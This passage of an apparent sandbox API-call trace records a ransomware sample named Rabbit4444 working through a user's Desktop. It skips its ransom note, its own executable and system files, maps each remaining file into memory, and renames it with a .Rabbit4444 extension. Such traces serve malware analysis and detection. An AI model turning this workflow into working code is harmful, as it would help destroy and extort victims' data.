(lpString1="UlU8B2wEqPRo", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2="Rabbit4444.exe") returned 1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2=".") returned 1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2="..") returned 1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2="windows") returned -1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2="bootmgr") returned 1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2="pagefile.sys") returned 1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2="boot") returned 1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2="ids.txt") returned 1 [0050.140] lstrcmpiW (lpString1="UlU8B2wEqPRo", lpString2="NTUSER.DAT") returned 1 [0050.140] lstrcpyW (in: lpString1=0x130eb68, lpString2="UlU8B2wEqPRo" | out: lpString1="UlU8B2wEqPRo") returned="UlU8B2wEqPRo" [0050.141] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0050.141] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4a) returned 0x10cd98 [0050.141] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf63f0 [0050.141] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe953050, ftCreationTime.dwHighDateTime=0x1d4c972, ftLastAccessTime.dwLowDateTime=0xe6e3d340, ftLastAccessTime.dwHighDateTime=0x1d4cb11, ftLastWriteTime.dwLowDateTime=0xe6e3d340, ftLastWriteTime.dwHighDateTime=0x1d4cb11, nFileSizeHigh=0x0, nFileSizeLow=0x32d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ur9UXi87PYp.bmp", cAlternateFileName="UR9UXI~1.BMP")) returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2="Rabbit4444.exe") returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2=".") returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2="..") returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2="windows") returned -1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2="bootmgr") returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2="pagefile.sys") returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2="boot") returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2="ids.txt") returned 1 [0050.141] lstrcmpiW (lpString1="Ur9UXi87PYp.bmp", lpString2="NTUSER.DAT") returned 1 [0050.141] lstrcpyW (in: lpString1=0x130eb68, lpString2="Ur9UXi87PYp.bmp" | out: lpString1="Ur9UXi87PYp.bmp") returned="Ur9UXi87PYp.bmp" [0050.141] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Ur9UXi87PYp.bmp", dwFileAttributes=0x0) returned 1 [0050.141] lstrlenW (lpString="Ur9UXi87PYp.bmp") returned 15 [0050.141] lstrlenW (lpString="Rabbit4444") returned 10 [0050.141] lstrcmpiW (lpString1="i87PYp.bmp", lpString2="Rabbit4444") returned -1 [0050.141] lstrlenW (lpString=".dll") returned 4 [0050.141] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.141] lstrlenW (lpString=".lnk") returned 4 [0050.141] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.141] lstrlenW (lpString=".ini") returned 4 [0050.141] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.141] lstrlenW (lpString=".sys") returned 4 [0050.141] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.141] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Ur9UXi87PYp.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ur9uxi87pyp.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.142] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.142] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14145239321) returned 1 [0050.142] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=13011) returned 1 [0050.142] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0050.142] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0050.142] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x35e0, lpName=0x0) returned 0x298 [0050.142] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x35e0) returned 0x70000 [0050.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0050.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0050.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.143] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14145371772) returned 1 [0050.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0050.143] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0050.143] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.143] CloseHandle (hObject=0x298) returned 1 [0050.143] CloseHandle (hObject=0x278) returned 1 [0050.144] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\Ur9UXi87PYp.bmp.Rabbit4444") returned 50 [0050.144] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Ur9UXi87PYp.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ur9uxi87pyp.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\Ur9UXi87PYp.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ur9uxi87pyp.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0050.145] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf13eb70, ftCreationTime.dwHighDateTime=0x1d4d1b0, ftLastAccessTime.dwLowDateTime=0x373d2040, ftLastAccessTime.dwHighDateTime=0x1d4caf8, ftLastWriteTime.dwLowDateTime=0x373d2040, ftLastWriteTime.dwHighDateTime=0x1d4caf8, nFileSizeHigh=0x0, nFileSizeLow=0x144fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wbsZjt46N6Bq440.avi", cAlternateFileName="WBSZJT~1.AVI")) returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2="Rabbit4444.exe") returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2=".") returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2="..") returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2="windows") returned -1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2="bootmgr") returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2="pagefile.sys") returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2="boot") returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2="ids.txt") returned 1 [0050.145] lstrcmpiW (lpString1="wbsZjt46N6Bq440.avi", lpString2="NTUSER.DAT") returned 1 [0050.145] lstrcpyW (in: lpString1=0x130eb68, lpString2="wbsZjt46N6Bq440.avi" | out: lpString1="wbsZjt46N6Bq440.avi") returned="wbsZjt46N6Bq440.avi" [0050.145] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\wbsZjt46N6Bq440.avi", dwFileAttributes=0x0) returned 1 [0050.145] lstrlenW (lpString="wbsZjt46N6Bq440.avi") returned 19 [0050.145] lstrlenW (lpString="Rabbit4444") returned 10 [0050.145] lstrcmpiW (lpString1="6Bq440.avi", lpString2="Rabbit4444") returned -1 [0050.145] lstrlenW (lpString=".dll") returned 4 [0050.145] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0050.145] lstrlenW (lpString=".lnk") returned 4 [0050.145] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0050.145] lstrlenW (lpString=".ini") returned 4 [0050.145] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0050.145] lstrlenW (lpString=".sys") returned 4 [0050.145] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0050.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\wbsZjt46N6Bq440.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\wbszjt46n6bq440.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.146] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.146] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14145637142) returned 1 [0050.146] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=83198) returned 1 [0050.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0050.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0050.146] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14800, lpName=0x0) returned 0x298 [0050.146] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14800) returned 0x70000 [0050.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.148] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14145911519) returned 1 [0050.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0050.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0050.148] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.149] CloseHandle (hObject=0x298) returned 1 [0050.149] CloseHandle (hObject=0x278) returned 1 [0050.150] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\wbsZjt46N6Bq440.avi.Rabbit4444") returned 54 [0050.150] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\wbsZjt46N6Bq440.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\wbszjt46n6bq440.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\wbsZjt46N6Bq440.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\wbszjt46n6bq440.avi.rabbit4444"), dwFlags=0x1) returned 1 [0050.150] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb76d860, ftCreationTime.dwHighDateTime=0x1d4d515, ftLastAccessTime.dwLowDateTime=0xba1cd50, ftLastAccessTime.dwHighDateTime=0x1d4c8eb, ftLastWriteTime.dwLowDateTime=0xba1cd50, ftLastWriteTime.dwHighDateTime=0x1d4c8eb, nFileSizeHigh=0x0, nFileSizeLow=0x175a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x-r-NNo.xls", cAlternateFileName="")) returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2="Rabbit4444.exe") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2=".") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2="..") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2="windows") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2="bootmgr") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2="pagefile.sys") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2="boot") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2="ids.txt") returned 1 [0050.151] lstrcmpiW (lpString1="x-r-NNo.xls", lpString2="NTUSER.DAT") returned 1 [0050.151] lstrcpyW (in: lpString1=0x130eb68, lpString2="x-r-NNo.xls" | out: lpString1="x-r-NNo.xls") returned="x-r-NNo.xls" [0050.151] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\x-r-NNo.xls", dwFileAttributes=0x0) returned 1 [0050.151] lstrlenW (lpString="x-r-NNo.xls") returned 11 [0050.151] lstrlenW (lpString="Rabbit4444") returned 10 [0050.151] lstrcmpiW (lpString1="-r-NNo.xls", lpString2="Rabbit4444") returned 1 [0050.151] lstrlenW (lpString=".dll") returned 4 [0050.151] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.151] lstrlenW (lpString=".lnk") returned 4 [0050.151] lstrcmpiW (lpString1=".xls", lpString2=".lnk") returned 1 [0050.151] lstrlenW (lpString=".ini") returned 4 [0050.151] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0050.151] lstrlenW (lpString=".sys") returned 4 [0050.151] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0050.151] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\x-r-NNo.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\x-r-nno.xls"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.151] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.151] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14146225612) returned 1 [0050.152] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=95652) returned 1 [0050.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0050.152] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0050.152] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x178b0, lpName=0x0) returned 0x298 [0050.152] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x178b0) returned 0x70000 [0050.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.154] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14146516458) returned 1 [0050.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0050.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0050.155] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.156] CloseHandle (hObject=0x298) returned 1 [0050.156] CloseHandle (hObject=0x278) returned 1 [0050.156] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\x-r-NNo.xls.Rabbit4444") returned 46 [0050.156] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\x-r-NNo.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\x-r-nno.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\x-r-NNo.xls.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\x-r-nno.xls.rabbit4444"), dwFlags=0x1) returned 1 [0050.157] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf640cc30, ftCreationTime.dwHighDateTime=0x1d4cd4b, ftLastAccessTime.dwLowDateTime=0x1f0e5ed0, ftLastAccessTime.dwHighDateTime=0x1d4d07a, ftLastWriteTime.dwLowDateTime=0x1f0e5ed0, ftLastWriteTime.dwHighDateTime=0x1d4d07a, nFileSizeHigh=0x0, nFileSizeLow=0xfe7c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XCT6Fbj.odt", cAlternateFileName="")) returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2="Rabbit4444.exe") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2=".") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2="..") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2="windows") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2="bootmgr") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2="pagefile.sys") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2="boot") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2="ids.txt") returned 1 [0050.157] lstrcmpiW (lpString1="XCT6Fbj.odt", lpString2="NTUSER.DAT") returned 1 [0050.157] lstrcpyW (in: lpString1=0x130eb68, lpString2="XCT6Fbj.odt" | out: lpString1="XCT6Fbj.odt") returned="XCT6Fbj.odt" [0050.157] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XCT6Fbj.odt", dwFileAttributes=0x0) returned 1 [0050.157] lstrlenW (lpString="XCT6Fbj.odt") returned 11 [0050.157] lstrlenW (lpString="Rabbit4444") returned 10 [0050.157] lstrcmpiW (lpString1="CT6Fbj.odt", lpString2="Rabbit4444") returned -1 [0050.157] lstrlenW (lpString=".dll") returned 4 [0050.158] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0050.158] lstrlenW (lpString=".lnk") returned 4 [0050.158] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0050.158] lstrlenW (lpString=".ini") returned 4 [0050.158] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0050.158] lstrlenW (lpString=".sys") returned 4 [0050.158] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0050.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XCT6Fbj.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\xct6fbj.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.158] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.158] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14146862762) returned 1 [0050.158] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=65148) returned 1 [0050.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.158] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0050.158] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10180, lpName=0x0) returned 0x298 [0050.158] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10180) returned 0x70000 [0050.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0050.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0050.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0050.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0050.161] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14147131584) returned 1 [0050.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0050.161] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.161] CloseHandle (hObject=0x298) returned 1 [0050.161] CloseHandle (hObject=0x278) returned 1 [0050.162] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\XCT6Fbj.odt.Rabbit4444") returned 46 [0050.162] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XCT6Fbj.odt" (normalized: "c:\\users\\fd1hvy\\desktop\\xct6fbj.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XCT6Fbj.odt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\xct6fbj.odt.rabbit4444"), dwFlags=0x1) returned 1 [0050.163] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa356ae20, ftCreationTime.dwHighDateTime=0x1d4d176, ftLastAccessTime.dwLowDateTime=0xf2f827f0, ftLastAccessTime.dwHighDateTime=0x1d4ccea, ftLastWriteTime.dwLowDateTime=0xf2f827f0, ftLastWriteTime.dwHighDateTime=0x1d4ccea, nFileSizeHigh=0x0, nFileSizeLow=0x2c8b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yCE8TOTz8j0hoj8IV.png", cAlternateFileName="YCE8TO~1.PNG")) returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2="Rabbit4444.exe") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2=".") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2="..") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2="windows") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2="bootmgr") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2="pagefile.sys") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2="boot") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2="ids.txt") returned 1 [0050.163] lstrcmpiW (lpString1="yCE8TOTz8j0hoj8IV.png", lpString2="NTUSER.DAT") returned 1 [0050.163] lstrcpyW (in: lpString1=0x130eb68, lpString2="yCE8TOTz8j0hoj8IV.png" | out: lpString1="yCE8TOTz8j0hoj8IV.png") returned="yCE8TOTz8j0hoj8IV.png" [0050.163] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yCE8TOTz8j0hoj8IV.png", dwFileAttributes=0x0) returned 1 [0050.163] lstrlenW (lpString="yCE8TOTz8j0hoj8IV.png") returned 21 [0050.163] lstrlenW (lpString="Rabbit4444") returned 10 [0050.163] lstrcmpiW (lpString1="hoj8IV.png", lpString2="Rabbit4444") returned -1 [0050.163] lstrlenW (lpString=".dll") returned 4 [0050.163] lstrcmpiW 